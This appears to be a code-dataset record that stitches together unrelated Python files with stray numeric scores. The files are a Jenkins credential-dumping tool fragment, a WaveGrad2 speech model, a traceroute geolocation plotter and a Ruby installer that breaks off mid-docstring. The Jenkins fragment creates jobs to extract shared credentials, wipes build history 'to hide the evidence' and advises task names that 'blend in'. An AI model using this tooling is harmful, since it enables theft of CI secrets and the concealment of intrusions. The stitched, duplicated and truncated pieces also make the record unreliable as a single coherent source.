except Exception:
pass
if i < (len(result) - 1):
print(
"-----------------------------------------------------------------------------"
)
except jenkinslib.JenkinsException as ex:
if "[403]" in str(ex).split("\n")[0]:
self.logging.fatal(
"%s authentication failed or no access", self._get_username(cred)
)
else:
self.logging.fatal(
"Unable to access Jenkins at: %s With User: %s For Reason:\n\t%s"
% (
(
self.server_url.netloc
if len(self.server_url.netloc) > 0
else self.args.server
),
self._get_username(cred),
str(ex).split("\n")[0],
)
)
except (req_exc.SSLError, req_exc.ConnectionError):
self.logging.fatal(
"Unable to connect to: "
+ (self.server_url.netloc if len(self.server_url.netloc) > 0 else self.args.server)
)
except NonCriticalException as ex:
with HijackStdOut():
print(str(ex))
except Exception:
self.logging.exception("")
exit(1)
finally:
# Do Cleanup
if state > 1:
try:
server.delete_job(self.args.task_name)
return
except (
jenkinslib.JenkinsException,
req_exc.SSLError,
req_exc.ConnectionError,
req_exc.HTTPError,
):
with HijackStdOut():
print(
"WARNING: Unable to delete the job, attempting secondary clean-up. You should double check."
)
# We were unable to delete the the task, so we need to do secondary clean-up as best we can:
# First we delete all console output and run history:
try:
server.delete_all_job_builds(self.args.task_name)
except (
jenkinslib.JenkinsException,
req_exc.SSLError,
req_exc.ConnectionError,
req_exc.HTTPError,
):
print(
"WARNING: Unable to clean-up console output. You should definitely try to do this yourself."
)
# Second, overwrite the job with an empty job:
try:
server.reconfig_job(
self.args.task_name,
"<?xml version='1.1' encoding='UTF-8'?><project></project>",
)
except (
jenkinslib.JenkinsException,
req_exc.SSLError,
req_exc.ConnectionError,
req_exc.HTTPError,
):
print(
"WARNING: Unable to wipeout job to hide the evidence. You should definitely try to do this yourself."
)
# Third, attempt to disable the job:
try:
server.disable_job(self.args.task_name)
except (
jenkinslib.JenkinsException,
req_exc.SSLError,
req_exc.ConnectionError,
req_exc.HTTPError,
):
print(
"WARNING: Unable to disable job. You should definitely try to do this yourself."
)
def _generate_job_xml(self, job_type, nodes, barrier, credentials):
file_name = "f" + "".join(random.choices(string.ascii_letters + string.digits, k=8))
loader = quik.FileLoader(os.path.join("data", "xml"))
bindings_template = loader.load_template("credential_binding_template.xml")
job_template = loader.load_template("job_template.xml")
if job_type == "posix":
cmd_template = quik.FileLoader(os.path.join("data", "bash")).load_template(
"posix_job_dump_creds_template.sh"
)
else:
cmd_template = quik.FileLoader(os.path.join("data", "batch")).load_template(
"windows_job_dump_creds_template.bat"
)
for i in range(len(credentials)):
if credentials[i]["type"] == "SSHKEY":
credentials[i]["key_file_variable"] = "a{0}k".format(i)
credentials[i]["username_variable"] = "a{0}u".format(i)
credentials[i]["passphrase_variable"] = "a{0}p".format(i)
else: # For now everything else uses only one variable
credentials[i]["variable"] = "a{0}".format(i)
bindings = bindings_template.render(locals())
cmds = cmd_template.render(locals())
return job_template.render(
{
"job_type": "BatchFile" if job_type == "windows" else "Shell",
"assigned_nodes": "({})".format(
xmlescape(" || ".join(['"{}"'.format(x["name"]) for x in nodes]))
),
"commands": xmlescape(cmds),
"credential_bindings": bindings,
}
)
class DumpCredsViaJobParser:
def cmd_DumpCredsViaJob(self):
"""Handles parsing of RunCommand Subcommand arguments"""
self._create_contextual_parser(
"DumpCredsViaJob",
"Dump credentials via explicit enumeration of shared credentials in a job (Only requires job creation permissions and some shared credentials)",
)
self._add_common_arg_parsers()
self.parser.add_argument(
"-N",
"--node",
metavar="<Node>",
help="Node to execute against. If specified, you must also pass -T",
action="store",
dest="node",
required=False,
)
self.parser.add_argument(
"-T",
"--nodetype",
metavar="<Node Type>",
help='Node Type, either: "posix" or "windows". If specified, you must also pass -N',
choices=["posix", "windows"],
dest="node_type",
required=False,
)
self.parser.add_argument(
metavar="<Task Name>",
help="Task to Create, must be unique (may not be deleted if user doesn't have job deletion permissions, so pick something that blends in)",
action="store",
dest="task_name",
)
args = self.parser.parse_args()
self._validate_server_url(args)
self._validate_output_file(args)
if not args.task_name or any(
x not in (string.ascii_letters + string.digits + "/") for x in args.task_name
):
with HijackStdOut():
self.parser.print_usage()
print(
"\nError: Task Name must be alphanumeric string with optional subfolder pathing via forward slashes."
)
exit(1)
if (args.node and not args.node_type) or (args.node_type and not args.node):
with HijackStdOut():
self.parser.print_usage()
print("\nError: You must either specify both Node and Node Type or neither")
exit(1)
return self._handle_authentication(args) | 0.294925 | 0.215258 |
import os
import json
import torch
import torch.nn as nn
import torch.nn.functional as F
from .modules import (
TextEncoder,
DurationPredictor,
RangeParameterPredictor,
GaussianUpsampling,
SamplingWindow,
)
from wavegrad import WaveGrad
from utils.tools import get_mask_from_lengths
class WaveGrad2(nn.Module):
    """WaveGrad2: end-to-end text-to-waveform model.

    Pipeline, per the modules wired below: text encoding -> duration
    prediction -> Gaussian upsampling of encoder frames to the audio rate ->
    windowed segment sampling -> WaveGrad diffusion decoder.
    """

    def __init__(self, preprocess_config, model_config, train_config):
        super(WaveGrad2, self).__init__()
        self.model_config = model_config

        self.encoder = TextEncoder(model_config)
        self.duration_predictor = DurationPredictor(model_config)
        self.range_param_predictor = RangeParameterPredictor(model_config)
        self.gaussian_upsampling = GaussianUpsampling(model_config)
        self.sampling_window = SamplingWindow(model_config, train_config)
        self.decoder = WaveGrad(preprocess_config, model_config)

        # Optional speaker embedding, built only for multi-speaker setups;
        # the speaker count is read from the preprocessed speakers.json.
        self.speaker_emb = None
        if model_config["multi_speaker"]:
            with open(
                os.path.join(
                    preprocess_config["path"]["preprocessed_path"], "speakers.json"
                ),
                "r",
            ) as f:
                n_speaker = len(json.load(f))
            self.speaker_emb = nn.Embedding(
                n_speaker,
                model_config["transformer"]["encoder_hidden"],
            )

        # Populated on every forward() call so the most recent aligned
        # segments can be reused afterwards (see the "Save for sampling" note).
        self.encoder_seg = self.audio_seg = None

    def forward(
        self,
        speakers,
        texts,
        src_lens,
        max_src_len,
        audios,
        d_targets,
        seq_starts,
        phones,
    ):
        """Training forward pass using ground-truth durations ``d_targets``.

        Returns the diffusion noise loss plus the intermediates needed for
        the duration loss and attention visualization.
        """
        # Text Encoding
        src_masks = get_mask_from_lengths(src_lens, max_src_len)
        output = self.encoder(texts, src_lens, src_masks)
        if self.speaker_emb is not None:
            # broadcast one speaker vector across all source positions
            output = output + self.speaker_emb(speakers).unsqueeze(1).expand(
                -1, max_src_len, -1
            )

        # Resampling
        log_d_predictions = self.duration_predictor(output, src_lens, src_masks)
        range_param = self.range_param_predictor(output, src_lens, d_targets, src_masks)
        output, attns = self.gaussian_upsampling(output, d_targets, range_param, src_masks)
        # teacher forcing: the "rounded" durations reported are the targets
        d_rounded = d_targets

        # Sampling Window
        encoder_seg, audio_seg = self.sampling_window(output, audios, seq_starts)
        self.encoder_seg, self.audio_seg = encoder_seg, audio_seg  # Save for sampling

        # Compute Noise Loss
        noise_loss = self.decoder.compute_loss(encoder_seg.transpose(-2, -1), audio_seg)

        return (
            noise_loss,
            log_d_predictions,
            d_rounded,
            src_masks,
            src_lens,
            attns,
        )

    def inference(
        self,
        speakers,
        texts,
        src_lens,
        max_src_len,
        d_control=1.0,
    ):
        """Synthesis pass: predict durations, upsample, decode a waveform.

        ``d_control`` scales the rounded predicted durations (> 1.0 slows
        speech down, < 1.0 speeds it up).
        """
        # Text Encoding
        src_masks = get_mask_from_lengths(src_lens, max_src_len)
        output = self.encoder.inference(texts, src_masks)
        if self.speaker_emb is not None:
            output = output + self.speaker_emb(speakers).unsqueeze(1).expand(
                -1, max_src_len, -1
            )

        # Resampling
        log_d_predictions = self.duration_predictor.inference(output)
        # exp() inverts the log-duration; the -1 presumably undoes a +1
        # offset applied when the duration targets were built — TODO confirm
        # against the preprocessing code.
        d_rounded = torch.clamp(
            (torch.round(torch.exp(log_d_predictions) - 1) * d_control),
            min=0,
        )
        range_param = self.range_param_predictor.inference(output, d_rounded)
        output, attns = self.gaussian_upsampling(output, d_rounded, range_param, src_masks)

        # Decoding
        output = self.decoder.forward(
            output.transpose(-2, -1), store_intermediate_states=False
        )
return output | model/WaveGrad2.py | import os
import json
import torch
import torch.nn as nn
import torch.nn.functional as F
from .modules import (
TextEncoder,
DurationPredictor,
RangeParameterPredictor,
GaussianUpsampling,
SamplingWindow,
)
from wavegrad import WaveGrad
from utils.tools import get_mask_from_lengths
class WaveGrad2(nn.Module):
""" WaveGrad2 """
def __init__(self, preprocess_config, model_config, train_config):
super(WaveGrad2, self).__init__()
self.model_config = model_config
self.encoder = TextEncoder(model_config)
self.duration_predictor = DurationPredictor(model_config)
self.range_param_predictor = RangeParameterPredictor(model_config)
self.gaussian_upsampling = GaussianUpsampling(model_config)
self.sampling_window = SamplingWindow(model_config, train_config)
self.decoder = WaveGrad(preprocess_config, model_config)
self.speaker_emb = None
if model_config["multi_speaker"]:
with open(
os.path.join(
preprocess_config["path"]["preprocessed_path"], "speakers.json"
),
"r",
) as f:
n_speaker = len(json.load(f))
self.speaker_emb = nn.Embedding(
n_speaker,
model_config["transformer"]["encoder_hidden"],
)
self.encoder_seg = self.audio_seg = None
def forward(
self,
speakers,
texts,
src_lens,
max_src_len,
audios,
d_targets,
seq_starts,
phones,
):
# Text Encoding
src_masks = get_mask_from_lengths(src_lens, max_src_len)
output = self.encoder(texts, src_lens, src_masks)
if self.speaker_emb is not None:
output = output + self.speaker_emb(speakers).unsqueeze(1).expand(
-1, max_src_len, -1
)
# Resampling
log_d_predictions = self.duration_predictor(output, src_lens, src_masks)
range_param = self.range_param_predictor(output, src_lens, d_targets, src_masks)
output, attns = self.gaussian_upsampling(output, d_targets, range_param, src_masks)
d_rounded = d_targets
# Sampling Window
encoder_seg, audio_seg = self.sampling_window(output, audios, seq_starts)
self.encoder_seg, self.audio_seg = encoder_seg, audio_seg # Save for sampling
# Compute Noise Loss
noise_loss = self.decoder.compute_loss(encoder_seg.transpose(-2, -1), audio_seg)
return (
noise_loss,
log_d_predictions,
d_rounded,
src_masks,
src_lens,
attns,
)
def inference(
self,
speakers,
texts,
src_lens,
max_src_len,
d_control=1.0,
):
# Text Encoding
src_masks = get_mask_from_lengths(src_lens, max_src_len)
output = self.encoder.inference(texts, src_masks)
if self.speaker_emb is not None:
output = output + self.speaker_emb(speakers).unsqueeze(1).expand(
-1, max_src_len, -1
)
# Resampling
log_d_predictions = self.duration_predictor.inference(output)
d_rounded = torch.clamp(
(torch.round(torch.exp(log_d_predictions) - 1) * d_control),
min=0,
)
range_param = self.range_param_predictor.inference(output, d_rounded)
output, attns = self.gaussian_upsampling(output, d_rounded, range_param, src_masks)
# Decoding
output = self.decoder.forward(
output.transpose(-2, -1), store_intermediate_states=False
)
return output | 0.824603 | 0.114023 |
import ipaddress
import json
import logging
import math
import os
import socket
import urllib.request
from typing import Optional, Tuple, Dict, Set
import plotly.graph_objects as go
from scapy.layers.inet import traceroute
from scapy.layers.inet6 import traceroute6
marker_size = 10  # plotly marker size used for every plotted hop
max_ttl_traceroute = 32  # upper bound on hops probed by scapy traceroute
cache_name = "ip_lat_lon_cache.csv"  # on-disk cache of geolocated IPs
class Trace:
def __init__(self):
self.ip_locations: Dict[str, Tuple[float, float]] = {}
self.blacklisted_ips: Set[str] = set()
def read_from_file(self) -> None:
if os.path.exists(cache_name):
try:
with open(cache_name, 'r') as cache:
cache.readline() # header
for line in cache.readlines():
ip, lat, lon = line.split(',')
self.ip_locations[ip] = float(lat), float(lon)
except Exception as e:
logging.error(f'Unable to load cache: {e}')
def write_to_file(self) -> None:
try:
with open(cache_name, 'w') as cache:
cache.write('ip,latitude,longitude\n')
for ip, (lat, lon) in self.ip_locations.items():
cache.write(f'{ip}, {lat}, {lon}\n')
except Exception as e:
logging.error(f'Unable to write to cache: {e}')
def get_lat_lon(self, ip_addr: str) -> Optional[Tuple[float, float]]:
if ip_addr in self.blacklisted_ips:
return None
elif ip_addr in self.ip_locations:
return self.ip_locations[ip_addr]
try:
with urllib.request.urlopen(f'https://geolocation-db.com/json/{ip_addr}') as url:
json_data = json.loads(url.read().decode())
if 'latitude' not in json_data or 'longitude' not in json_data:
self.blacklisted_ips.add(ip_addr)
return None
lat, lon = json_data['latitude'], json_data['longitude']
if lat == 'Not found' or lon == 'Not found' or lat is None or lon is None:
self.blacklisted_ips.add(ip_addr)
return None
else:
self.ip_locations[ip_addr] = lat, lon
return lat, lon
except Exception as e:
logging.warning(f'Unable to determine location of {ip_addr}: {e}')
return None
def trace(self, ip: str, hits: int, byte_count: int, timeout: int, display_name: bool) -> go.Scattergeo:
if isinstance(ipaddress.ip_address(ip), ipaddress.IPv6Address):
ans, err = traceroute6(ip, maxttl=max_ttl_traceroute, dport=53, verbose=False, timeout=timeout)
else:
ans, err = traceroute(ip, maxttl=max_ttl_traceroute, dport=53, verbose=False, timeout=timeout)
lats, lons, text, received = [], [], [], set()
msg = f'Route to {ip}: '
count = 1
for sent_ip, received_ip in ans.res:
res = self.get_lat_lon(received_ip.src)
if res is not None:
lat, lon = res[0], res[1]
lats += [lat]
lons += [lon]
text += [f'hop {count}: {received_ip.src if display_name else ""}']
msg += f'{sent_ip.dst} [{lat}, {lon}], '
received.add(received_ip.src)
count += 1
if ip not in received:
res = self.get_lat_lon(ip)
if res is not None:
lat, lon = res[0], res[1]
lats += [lat]
lons += [lon]
text += [f'hop {count}: {ip}']
logging.info(msg)
mode = 'markers' if len(lats) == 1 else 'markers+lines'
if display_name:
try:
name, _, _ = socket.gethostbyaddr(ip)
host_addr = f'{name} | '
except Exception as e:
logging.warning(f'Failed to get hostname of {ip}: {e}')
host_addr = ''
name = f'{host_addr} {ip}<br>'
else:
name = ''
return go.Scattergeo(mode=mode, lon=lons, lat=lats, text=text,
name=f'{name}{hits} packets, {byte_count} bytes',
line={'width': int(math.log(byte_count)) / 2},
marker={'size': marker_size, 'symbol': 'square'}) | sniff_and_trace/trace.py | import ipaddress
import json
import logging
import math
import os
import socket
import urllib.request
from typing import Optional, Tuple, Dict, Set
import plotly.graph_objects as go
from scapy.layers.inet import traceroute
from scapy.layers.inet6 import traceroute6
marker_size = 10
max_ttl_traceroute = 32
cache_name = "ip_lat_lon_cache.csv"
class Trace:
def __init__(self):
self.ip_locations: Dict[str, Tuple[float, float]] = {}
self.blacklisted_ips: Set[str] = set()
def read_from_file(self) -> None:
if os.path.exists(cache_name):
try:
with open(cache_name, 'r') as cache:
cache.readline() # header
for line in cache.readlines():
ip, lat, lon = line.split(',')
self.ip_locations[ip] = float(lat), float(lon)
except Exception as e:
logging.error(f'Unable to load cache: {e}')
def write_to_file(self) -> None:
try:
with open(cache_name, 'w') as cache:
cache.write('ip,latitude,longitude\n')
for ip, (lat, lon) in self.ip_locations.items():
cache.write(f'{ip}, {lat}, {lon}\n')
except Exception as e:
logging.error(f'Unable to write to cache: {e}')
def get_lat_lon(self, ip_addr: str) -> Optional[Tuple[float, float]]:
if ip_addr in self.blacklisted_ips:
return None
elif ip_addr in self.ip_locations:
return self.ip_locations[ip_addr]
try:
with urllib.request.urlopen(f'https://geolocation-db.com/json/{ip_addr}') as url:
json_data = json.loads(url.read().decode())
if 'latitude' not in json_data or 'longitude' not in json_data:
self.blacklisted_ips.add(ip_addr)
return None
lat, lon = json_data['latitude'], json_data['longitude']
if lat == 'Not found' or lon == 'Not found' or lat is None or lon is None:
self.blacklisted_ips.add(ip_addr)
return None
else:
self.ip_locations[ip_addr] = lat, lon
return lat, lon
except Exception as e:
logging.warning(f'Unable to determine location of {ip_addr}: {e}')
return None
def trace(self, ip: str, hits: int, byte_count: int, timeout: int, display_name: bool) -> go.Scattergeo:
if isinstance(ipaddress.ip_address(ip), ipaddress.IPv6Address):
ans, err = traceroute6(ip, maxttl=max_ttl_traceroute, dport=53, verbose=False, timeout=timeout)
else:
ans, err = traceroute(ip, maxttl=max_ttl_traceroute, dport=53, verbose=False, timeout=timeout)
lats, lons, text, received = [], [], [], set()
msg = f'Route to {ip}: '
count = 1
for sent_ip, received_ip in ans.res:
res = self.get_lat_lon(received_ip.src)
if res is not None:
lat, lon = res[0], res[1]
lats += [lat]
lons += [lon]
text += [f'hop {count}: {received_ip.src if display_name else ""}']
msg += f'{sent_ip.dst} [{lat}, {lon}], '
received.add(received_ip.src)
count += 1
if ip not in received:
res = self.get_lat_lon(ip)
if res is not None:
lat, lon = res[0], res[1]
lats += [lat]
lons += [lon]
text += [f'hop {count}: {ip}']
logging.info(msg)
mode = 'markers' if len(lats) == 1 else 'markers+lines'
if display_name:
try:
name, _, _ = socket.gethostbyaddr(ip)
host_addr = f'{name} | '
except Exception as e:
logging.warning(f'Failed to get hostname of {ip}: {e}')
host_addr = ''
name = f'{host_addr} {ip}<br>'
else:
name = ''
return go.Scattergeo(mode=mode, lon=lons, lat=lats, text=text,
name=f'{name}{hits} packets, {byte_count} bytes',
line={'width': int(math.log(byte_count)) / 2},
marker={'size': marker_size, 'symbol': 'square'}) | 0.70619 | 0.160266 |
from ..runtimetool import RuntimeTool
from .bashtoolmixin import BashToolMixIn
from .rvmtool import rvmTool
class rubyTool(BashToolMixIn, RuntimeTool):
    """Ruby is a dynamic, open source programming language.

    Home: https://www.ruby-lang.org/en/

    By default the latest available Ruby binary is used for the following OSes:
    * Debian & Ubuntu - uses Brightbox builds 1.9, 2.0, 2.1, 2.2, 2.3, 2.4.
    * CentOS, RHEL & Oracle Linux - uses SCL 1.9, 2.0, 2.2, 2.3

    You can forbid source builds by setting rubyBinOnly to non-empty string.
    Otherwise, System Ruby is used by default.

    If rubyVer is set then RVM is used to setup custom rubies.
    That may lead to long time and resource consumption due to compilation,
    if binary versions are not found for specific system.

    Note: RUBY_ENV and RAILS_ENV are set based on rubyEnv or .env.type
    """
    __slots__ = ()

    def getDeps(self):
        # RVM is always needed: it either builds rubies from source or
        # mounts an already-installed system ruby under a stable name.
        return ['rvm']

    def _installTool(self, env):
        """Install Ruby: pre-built binaries when available, else build via RVM."""
        rvmTool('rvm').ensureGpgKeys(env)

        if env['rubyFoundBinary']:
            self._installBinaries(env)
            return

        self._buildDeps(env)

        self._executil.callExternal([
            env['rvmBin'], 'install', env['rubySourceVer'], '--autolibs=read-only'
        ])
        self._executil.callExternal([
            env['rvmBin'], 'cleanup', 'all'
        ])

    def _installBinaries(self, env):
        """Install a distro-packaged Ruby and mount it into RVM (non-macOS)."""
        detect = self._detect
        install = self._install
        pathutil = self._pathutil
        executil = self._executil

        ver = env['rubyVer']
        # name under which the system ruby gets mounted into RVM below
        rvm_ruby_ver = 'system-{0}'.format(ver)
        pkgver = ver

        if detect.isDebian() or detect.isUbuntu():
            code_name = self._detect.osCodeName()

            if code_name in ['stretch']:
                # repo id suggests an OpenSSL 1.0 backport is needed on
                # stretch for the Brightbox builds — TODO confirm
                install.aptRepo('jessie-ssl10bp',
                                'deb http://deb.debian.org/debian jessie-backports main')

            repo = env['rubyBrightboxRepo']
            install.aptRepo(
                'brightbox-ruby',
                "deb {0} $codename$ main".format(repo),
                self._GPG_BIRGHTBOX_REPO,
                codename_map={
                    # Ubuntu
                    # Debian
                    'jessie': 'trusty',
                    'stretch': 'xenial',
                    'buster': 'bionic',
                    'testing': 'bionic',
                    'sid': 'bionic',
                },
                repo_base='{0}/dists'.format(repo)
            )

            if ver == '1.9':
                # Brightbox names its 1.9 packages with the full 1.9.x version
                pkgver = '1.9.[0-9]'

                if detect.isDebian():
                    # presumably the Ubuntu 1.9 builds need these libs that
                    # Debian does not ship — fetched from an Ubuntu mirror
                    UBUNTU_MIRROR = 'https://debian.charite.de/ubuntu'
                    pkg = UBUNTU_MIRROR + '/pool/main/r/readline6/libreadline6_6.3-8ubuntu2_amd64.deb'
                    install.dpkg(env, 'libreadline6', pkg)
                    pkg = UBUNTU_MIRROR + '/pool/main/g/gdbm/libgdbm5_1.14.1-6_amd64.deb'
                    install.dpkg(env, 'libgdbm5', pkg)

            install.deb([
                'ruby{0}'.format(pkgver),
                'ruby{0}-dev'.format(pkgver),
            ])

            ruby_bins = self._ext.glob.glob('/usr/bin/ruby{0}*'.format(ver))

            if len(ruby_bins) == 0:
                self._errorExit('No Ruby found for version {0}'.format(ver))

            ruby_bin = ruby_bins[0]
        elif detect.isSCLSupported():
            sclname = self._rubySCLName(ver)
            install.yumSCL()
            install.yum(sclname)

            # required for LD_LIBRARY_PATH
            env_to_set = executil.callExternal(
                ['scl', 'enable', sclname, 'env'], verbose=False)
            pathutil.updateEnvFromOutput(env_to_set)

            ruby_bin = executil.callExternal(
                ['scl', 'enable', sclname, 'which ruby'], verbose=False).strip()
        elif detect.isMacOS():
            # Homebrew manages the install entirely; no RVM mount on macOS
            formula = 'ruby@{0}'.format(ver)
            install.brew(formula)
            return
        else:
            self._systemDeps()
            rvm_ruby_ver = 'system'
            ruby_bin = pathutil.which('ruby')

        # (re-)mount the binary ruby into RVM under an "ext-..." name;
        # the remove is best-effort for idempotent re-runs
        executil.callExternal([
            env['rvmBin'], 'remove', 'ext-{0}'.format(rvm_ruby_ver)
        ], suppress_fail=True)
        executil.callExternal([
            env['rvmBin'], 'mount', ruby_bin, '-n', rvm_ruby_ver
        ])

    def _rubySCLName(self, ver):
        """Map a Ruby version like '2.3' to its Software Collections name."""
        pkgver = ver.replace('.', '')

        if pkgver == '19':
            sclname = 'ruby193'
        elif pkgver == '20':
            sclname = 'ruby200'
        else:
            sclname = 'rh-ruby' + pkgver

        return sclname

    def _fixRvmLinks(self, env, name, ver):
        """Repoint RVM's mounted-ruby bin symlinks at the versioned binaries.

        Debian/Ubuntu install e.g. ruby2.3, gem2.3, ...; this makes the
        unversioned names inside the RVM mount resolve to them.
        """
        ospath = self._ospath
        os = self._os
        glob = self._ext.glob
        bin_dir = ospath.join(env['rvmDir'], 'rubies', name, 'bin')

        for f in ['erb', 'gem', 'irb', 'rake', 'rdoc', 'ri', 'ruby', 'testrb']:
            f = ospath.join(bin_dir, f)
            res = glob.glob('{0}{1}*'.format(f, ver))

            if res:
                res = ospath.basename(res[0])

                if os.readlink(f) == res:
                    continue  # already points at the versioned binary

                try:
                    os.unlink(f)
                except Exception as e:
                    self._warn(str(e))

                os.symlink(res, f)

    def _updateTool(self, env):
        # binary installs are updated by the system package manager;
        # only RVM-built (source) rubies are re-installed here
        if not env['rubyFoundBinary']:
            self._installTool(env)

    def uninstallTool(self, env):
        """Remove an RVM-built ruby; binary installs are left to the OS."""
        # NOTE(review): ruby_ver is assigned but never used below.
        ruby_ver = env['rubyVer']

        if not env['rubyFoundBinary']:
            self._executil.callExternal([
                env['rvmBin'], 'uninstall', env['rubyVer']
            ])

        self._have_tool = False

    def envNames(self):
        # configuration keys this tool reads from the .env config
        return ['rubyVer', 'rubyBin', 'rubyBinOnly', 'rubyForceBuild', 'rubySourceVer', 'rubyEnv']

    def initEnv(self, env):
        """Resolve Ruby settings, export RUBY_ENV/RAILS_ENV, detect ruby.

        Decides between binary and source installs per-platform and
        activates the matching RVM ruby for the current process.
        """
        environ = self._environ
        ospath = self._ospath
        detect = self._detect
        path = self._pathutil

        # --- RUBY_ENV/RAILS_ENV follow rubyEnv, falling back on .env type
        ruby_env = env.get('rubyEnv', '')

        if ruby_env:
            pass
        elif env['type'] == 'dev':
            ruby_env = 'development'
        else:
            ruby_env = 'production'

        environ['RUBY_ENV'] = ruby_env
        environ['RAILS_ENV'] = ruby_env

        # --- drop any stale GEM_HOME leaked from a previous activation
        if 'GEM_HOME' in environ:
            path.delEnvPath('PATH', environ['GEM_HOME'])
            path.delEnvPath('GEM_PATH', environ['GEM_HOME'])
            del environ['GEM_HOME']

        # ---
        rubyForceBuild = env.setdefault('rubyForceBuild', False)
        rubyBinOnly = env.setdefault('rubyBinOnly', not rubyForceBuild)

        if rubyBinOnly and rubyForceBuild:
            self._warn('"rubyBinOnly" and "rubyForceBuild" do not make sense'
                       ' when set together!')

        # --- per-platform list of versions available as binaries
        if detect.isDebian() or detect.isUbuntu():
            bb_repo = 'http://ppa.launchpad.net/brightbox/ruby-ng/ubuntu'
            ruby_binaries = ['1.9', '2.0', '2.1',
                             '2.2', '2.3', '2.4', '2.5', '2.6']
            code_name = self._detect.osCodeName()

            # NOTE(review): dead branch — the empty list means the
            # experimental repo is currently never selected.
            if code_name in []:
                # 1.9 build is broken on LaunchPad
                bb_repo = 'http://ppa.launchpad.net/brightbox/ruby-ng-experimental/ubuntu'

            env.setdefault('rubyBrightboxRepo', bb_repo)
        elif detect.isSCLSupported():
            # NOTE(review): both branches are identical at present
            if detect.isCentOS():
                ruby_binaries = ['1.9', '2.0', '2.2', '2.3', '2.4', '2.5']
            else:
                ruby_binaries = ['1.9', '2.0', '2.2', '2.3', '2.4', '2.5']
        elif detect.isMacOS():
            ruby_binaries = ['1.8', '1.9', '2.0',
                             '2.2', '2.3', '2.4', '2.5', '2.6']
        else:
            ruby_binaries = None

        # --- choose binary vs source and prime the environment
        if ruby_binaries and not rubyForceBuild:
            ruby_ver = env.setdefault('rubyVer', ruby_binaries[-1])
            foundBinary = ruby_ver in ruby_binaries
            rvm_ruby_ver = ruby_ver

            if foundBinary:
                rvm_ruby_ver = 'ext-system-{0}'.format(ruby_ver)

                # required for LD_LIBRARY_PATH
                if detect.isSCLSupported():
                    sclname = self._rubySCLName(ruby_ver)

                    try:
                        env_to_set = self._executil.callExternal(
                            ['scl', 'enable', sclname, 'env'], verbose=False)
                        self._pathutil.updateEnvFromOutput(env_to_set)
                    except self._ext.subprocess.CalledProcessError:
                        pass  # collection not installed yet
                    except OSError:
                        pass  # scl itself missing
                elif detect.isMacOS():
                    # macOS short-circuits: brew-managed ruby, no RVM use
                    env['rubyFoundBinary'] = True
                    formula = 'ruby@{0}'.format(ruby_ver)
                    brew_prefix = env['brewDir']
                    ruby_bin_dir = ospath.join(
                        brew_prefix, 'opt', formula, 'bin')

                    if ospath.exists(ruby_bin_dir):
                        self._pathutil.addBinPath(ruby_bin_dir, True)
                        super(rubyTool, self).initEnv(env)
                        self._environ['rubyVer'] = ruby_ver

                    return
                elif detect.isDebian() or detect.isUbuntu():
                    self._fixRvmLinks(env, rvm_ruby_ver, ruby_ver)
        else:
            ruby_ver = env.setdefault('rubyVer', self.SYSTEM_VER)
            foundBinary = ruby_ver == self.SYSTEM_VER
            rvm_ruby_ver = foundBinary and ruby_ver or 'ext-system'

        # ---
        # NOTE(review): rvm_dir is assigned but never used below.
        rvm_dir = env['rvmDir']
        env['rubyFoundBinary'] = foundBinary

        if rubyForceBuild or not foundBinary:
            rvm_ruby_ver = env.setdefault('rubySourceVer', ruby_ver or 'ruby')

        # activate the chosen ruby via RVM and import its env vars;
        # NOTE(review): the bare except silently aborts detection on any
        # failure (including rvm not yet installed)
        try:
            env_to_set = self._callBash(env,
                                        'source {0} && \
                rvm use {1} >/dev/null && \
                env | grep "rvm"'.format(env['rvmInit'], rvm_ruby_ver),
                                        verbose=False
                                        )
        except:
            return

        if env_to_set:
            self._pathutil.updateEnvFromOutput(env_to_set)

        super(rubyTool, self).initEnv(env)
        self._environ['rubyVer'] = ruby_ver

    def _buildDeps(self, env):
        """Install the build-time dependencies needed to compile Ruby.

        Each package-manager call below is a no-op on platforms where that
        manager is absent, so all are invoked unconditionally.
        """
        self._builddep.require(env, 'ssl')

        # APT
        # ---
        # NOTE(review): 'libgmp-dev' is listed twice.
        self._install.deb([
            'build-essential',
            'gawk',
            'make',
            'libc6-dev',
            'zlib1g-dev',
            'libyaml-dev',
            'libsqlite3-dev',
            'sqlite3',
            'autoconf',
            'libgmp-dev',
            'libgdbm-dev',
            'libncurses5-dev',
            'automake',
            'libtool',
            'bison',
            'pkg-config',
            'libffi-dev',
            'libgmp-dev',
            'libreadline-dev',
        ])

        # Extra repo before the rest
        # ---
        self._install.yumEPEL()
        self._install.rpm([
            'binutils',
            'patch',
            'libyaml-devel',
            'autoconf',
            'gcc',
            'gcc-c++',
            'glibc-devel',
            'readline-devel',
            'zlib-devel',
            'libffi-devel',
            'automake',
            'libtool',
            'bison',
            'sqlite-devel',
            'make',
            'm4',
            'gdbm-devel',
            'sqlite3-devel',
        ])

        # ---
        self._install.emergeDepsOnly(['dev-lang/ruby'])
        self._install.pacman(['ruby'])
        self._install.apk('build-base')

    def _systemDeps(self):
        """Install the distro's stock Ruby packages (system-ruby path)."""
        self._install.debrpm(['ruby'])
        self._install.emerge(['dev-lang/ruby'])
        self._install.pacman(['ruby'])
        self._install.apk(['ruby',
                           'ruby-bigdecimal',
                           'ruby-libs',
                           'ruby-io-console',
                           'ruby-irb',
                           'ruby-json',
                           'ruby-minitest',
                           'ruby-net-telnet',
                           'ruby-power_assert',
                           'ruby-xmlrpc'
                           ])

    # GPG key for the Brightbox APT repo used by _installBinaries.
    # NOTE(review): "BIRGHTBOX" is a typo, kept because it is referenced
    # above; key material is a placeholder in this copy of the source.
    _GPG_BIRGHTBOX_REPO = '''
-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: SKS 1.1.6
Comment: Hostname: keyserver.ubuntu.com

<KEY>
-----END PGP PUBLIC KEY BLOCK-----
'''

    def tuneDefaults(self, env):
        # deployment tuning hints consumed by the CID runtime layer
        return {
            'minMemory': '8M',
            'socketType': 'none',
            'scalable': False,
            'reloadable': False,
            'multiCore': True,
} | futoin/cid/tool/rubytool.py |
from ..runtimetool import RuntimeTool
from .bashtoolmixin import BashToolMixIn
from .rvmtool import rvmTool
class rubyTool(BashToolMixIn, RuntimeTool):
"""Ruby is a dynamic, open source programming language.
Home: https://www.ruby-lang.org/en/
By default the latest available Ruby binary is used for the following OSes:
* Debian & Ubuntu - uses Brightbox builds 1.9, 2.0, 2.1, 2.2, 2.3, 2.4.
* CentOS, RHEL & Oracle Linux - uses SCL 1.9, 2.0, 2.2, 2.3
You can forbid source builds by setting rubyBinOnly to non-empty string.
Otherwise, System Ruby is used by default.
If rubyVer is set then RVM is used to setup custom rubies.
That may lead to long time and resource consumption due to compilation,
if binary versions are not found for specific system.
